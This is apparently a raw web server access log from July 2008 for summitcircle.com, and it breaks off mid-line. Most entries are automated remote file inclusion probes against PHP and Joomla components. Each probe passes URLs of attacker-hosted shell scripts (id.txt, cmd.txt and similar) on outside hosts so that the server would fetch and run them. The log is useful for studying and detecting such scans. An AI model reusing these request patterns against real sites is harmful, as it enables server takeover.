89.108.66.188 - - [13/Jul/2008:18:34:20 -0700] "GET /logs//home.php?content=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:18:34:22 -0700] "GET /logs/access_080114.log//home.php?content=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.89.31.195 - - [13/Jul/2008:18:34:33 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.6.18.240 - - [13/Jul/2008:18:34:49 -0700] "GET /logs/access_071224.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:35:45 -0700] "GET /logs/access.log/db.php?path_local=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:35:48 -0700] "GET /db.php?path_local=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:35:52 -0700] "GET /logs/db.php?path_local=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.210.119.202 - - [13/Jul/2008:18:37:24 -0700] "GET /logs/access_071119.log/components/com_forum/download.php?phpbb_root_path=http://www.koral.or.id/components/com_joomlaboard/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
207.210.119.202 - - [13/Jul/2008:18:37:24 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.koral.or.id/components/com_joomlaboard/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
207.210.119.202 - - [13/Jul/2008:18:37:24 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.koral.or.id/components/com_joomlaboard/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:18:37:34 -0700] "GET /logs//home.php?content=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:18:37:35 -0700] "GET //home.php?content=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.205.28.236 - - [13/Jul/2008:18:38:12 -0700] "GET /logs/index.php?sourcedir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.205.28.236 - - [13/Jul/2008:18:38:12 -0700] "GET /index.php?sourcedir=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:38:42 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:38:45 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.128.50.35 - - [13/Jul/2008:18:38:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:39:04 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:39:04 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:39:04 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.210.119.202 - - [13/Jul/2008:18:39:15 -0700] "GET /logs/administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.summitcircle.com"
207.210.119.202 - - [13/Jul/2008:18:39:15 -0700] "GET /administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:39:54 -0700] "GET /logs/access_070826.log//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.